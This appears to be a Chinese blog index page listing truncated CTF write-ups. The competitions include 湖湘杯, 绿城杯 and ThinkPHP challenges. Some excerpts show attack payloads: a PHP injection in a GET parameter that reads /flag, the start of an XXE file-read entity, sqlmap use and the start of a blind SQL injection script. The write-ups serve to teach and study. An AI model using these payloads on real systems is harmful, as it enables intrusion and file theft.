满秋

湖湘杯2021 MultistageAgency 解题思路 前言 这题是昨天湖湘杯线下的一个题目。修起来并不困难。但是解起来非常困难(想不起来.png) 在赛场最后半小时有一个队伍才出一血。膜膜膜 赛后和一血师傅交流了一下。这里复现一下 代码审计 题...

发布 0 条评论

绿城杯 - ezjava SQL注入 这题属于是调一天 前台SQL注入 直接sqlmap跑就可以了 能拿到密码 admin ZM3vFeqaAI7LbIbx xxe读文件 登录后后台xxe把数据带出来 <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:////usr/local...

发布 0 条评论

WEB easythinkphp GET /index.php?m=--><?=file_get_contents('/flag');?> HTTP/1.1 Host: eee6bf45-c507-4650-8b17-d4225e2d80ee.node4.buuoj.cn Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Req...

发布 0 条评论

BabyCat 主页有个register和login。看JS。构造 /login data={"username":"test","password":"test"} 不能登陆。用同样的参数去register。可以注册用户。 然后登陆 登陆后有个download接口。 ...

发布 1 条评论

Hard_APT_jeesite 题目很明显,就是个jeesite1.2.7,从github可以拿到相应源码,因为题目描述中重点说了需要shiro的配置文件,所以我们主要关注源码中文件读取的部分。 方法1 可以首先查看web.xml的路由 主要关注到这个路由,跟进方...

发布 0 条评论

Dozer 域渗透系列 By 春 前言 因为有非预期的存在,导致题目究极白给,我会尽力按照预期解去写 题目质量很棒,期待来年再见 10.10.1.47 (Light_CMS) 是前几天红帽杯郭院士的那个后台Rce的改编版本 在testinclude下有文件包含 Rce 由...

发布 0 条评论

前言 总体来说,体验一般,web很套娃。没啥意思 sql 简单盲注 import requests as req import time def ord2hex(string): result = '' for i in string: result += hex(ord(i)) result = result.replace('0x...

发布 2 条评论

Thinkphp 5.0.24反序列化文件写 学了也快一年了 头一次去审计经典的框架洞。(反序列化其实一直不是很熟,所以借这次机会希望能更多的增长知识) 其实网上的链子已经非常多了 呜呜 我真的菜 环境搭建 compose一把索 然后发现./think不能...

发布 0 条评论